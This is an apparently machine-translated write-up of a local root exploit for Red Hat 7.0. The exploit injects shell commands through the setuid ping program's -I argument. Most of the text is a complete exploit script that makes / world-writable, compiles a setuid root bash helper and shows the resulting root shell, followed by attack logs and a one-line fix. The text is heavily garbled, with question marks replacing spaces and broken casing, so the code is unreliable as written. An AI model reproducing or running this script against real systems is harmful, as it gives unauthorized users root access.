RedHat7 local utilization PING Take root vulnerability details
First, statement, the company's coverage is not responsible for the loss caused by this vulnerability. If the attack code is not long, you can use shell or perl to write, and it is recommended to write with shell. Principle: Maybe it is the major vulnerability of RedHat7. His PING-I -I parameter specifies the interfabs to perform any code via ModProbe and Insmod, everyone knows that the power of the ping program is like this: [Hello! Sune4gle] $? Ls? -l? / bin / ping -rwsr-xr-x ???? 1? root ????? root ???????? 20604? AUG ?? 8 ?? 2000? / bin / ping ping program Call all the setuid bits of Raw_Socket, huh, we can use the PING -I parameter to ping a non-existing IP, of course, the parameters in front of IP are the key, that is, our execution command, S power makes us with ordinary authority The UID is running the EUID of ping is 0, so in fact we run the PING in the execution command with the permissions of super-support. This way if we run the following command: [Hello! Sune4gle] $ ping? -I? '; Chmod? O w?.'? 195.117.3.59? (DEV/NULL is written to other users on other users Oh, Of course, we can use the SLEEP statement to make the process waiting, use the waiting time we can write a C program, let him compile and run: cat?> / Xc? << _ Eof_ main ()? {?? setuid (0); ?? SETEUID (0); ?? SYSTEM ("CHMOD? 755? /; Rm? -F? / X;? Rm? -F? / Xc"); ?? EXECL ("/ bin / bash" , "Bash", "- I", 0);} _eof_ gcc? / xc? -o? / x chmod? 755? / x, everyone should understand? Oh, then create the XC file, and compile it, make it s power, huh, huh, make a setuid Rootshell, the following is the write code: #! / Bin / sh echo echo? "Redhat? 7.0? ? EXPLOIT "echo?" (c) 2000? suneagle?
"
echo
echo? "enjoy? Hacking !? :)"
echo
Ping = / bin / ping
Test? -u? $ ping? ||? ping = / bin / ping
IF? [?!? - u? $ ping?] ;? THEN
?? echo? "sorry,? no? setuid? ping."
?? exit? 0
Fi
echo? "Phase? 1:? MAKING? /? World-Writable ..."
$ Ping? -I? '; Chmod? O w?'? 195.117.3.59? (DEV/NULL
Sleep? 1
echo? "Phase? 2:? Compiling? Helper? Program? IN? / ..."
Cat?> / x.c? << _ EOF_
Main ()? {
?? setuid (0) ;? STEUID (0);
?? SYSTEM ("CHMOD? 755? /; rm? -f? / x;? rm? -f? /x.c");
?? EXECL ("/ bin / bash", "bash", "- i", 0);
}
_eof_
GCC? /X.c? -o? / x
CHMOD? 755? / x
echo? "Phase? 3:? Chown chmod? ON? OUR? HELPER? Program ..."
$ Ping? -I? '; Chown? 0? X'? 202.102.3.1? &> / Dev / null
Sleep? 1
$ Ping? -I? '; Chmod? S? X'? 202.101.23.1? &> / Dev / null
Sleep? 1
IF? [?!? - u? / x?] ;? THEN
?? echo? "apparently,? this? is? not? xiTemle? on? this? system? :("
?? EXIT? 1
Fi
echo? "ye!? Entering? rootshell ..."
/ x
echo? "Thank? you."
Haha, ok, I put this shell program in the REDHAT7 running test results:
First of all, I have to have a regular account, 嘿嘿
[Hello! Sune4gle] $? ./ Gtroot.sh
Redhat? 7.0 ?? EXPLOIT
(c)? 2000? suneagle?
Enjoy? Hacking !? :)
Phase? 1:? Making? /? World-write ...
Phase? 2:? Compiling? Helper? Program? IN? / ...
Phase? 3:? Chown chmod? ON? OUR? HELPER? PROGRAM ...
YE!? Entering? Rootshell ...
[Hello! Root] #? Id
UID = 0 (root)? GID = 500 (sune4gle)? groups = 500 (sune4gle)
[Hello! Root] #
Log after the attack:
Feb? 24? 11: 16:27? Sune4gle? Modprobe:? Modprobe:? Insmod?; Chmod? O w?.? Failed
Feb? 24? 11: 16: 30? Sune4gle? Modprobe:? Modprobe:? Insmod?; Chown? 0? X? Failed
Feb? 24? 11: 16: 31? Sune4gle? Modprobe:? Modprobe:? Insmod?; Chmod? S? X? Failed?
Solution:
Remove or limit the setuid bit of the PING program
[Hello! Sune4gle] #? Chmod? 655? / Bin / ping
